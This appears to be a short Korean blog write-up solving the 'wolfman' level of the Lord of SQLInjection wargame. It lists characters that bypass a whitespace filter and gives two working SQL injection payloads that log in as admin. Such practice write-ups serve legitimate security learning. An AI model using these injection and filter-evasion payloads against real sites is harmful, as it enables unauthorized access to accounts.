-
[LOS] wolfmanWargame/Lord of SQLInjection 2019. 7. 5. 00:02
[wolfman] https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php
공백문자가 필터링되어 있고, or을 사용하기 위해서는 공백문자가 무조건 필요하다.
공백문자를 우회하는 문제인 것 같다.
[ 공백 우회 ]
%0a, %0b, %0c, %0d, %09, /**/, ()공백을 우회하기 위해서 %20 대신 위와 같은 문자를 사용하면 된다.
?pw='%0aor%0aid='admin
또한,
or 대신 ||를 사용하면 공백이 필요없다.
?pw='||id='admin
'Wargame > Lord of SQLInjection' 카테고리의 다른 글
[LOS] orge (0) 2019.07.05 [LOS] darkelf (0) 2019.07.05 [LOS] orc (0) 2019.07.04 [LOS] goblin (0) 2019.07.04 [LOS] cobolt (0) 2019.07.04 댓글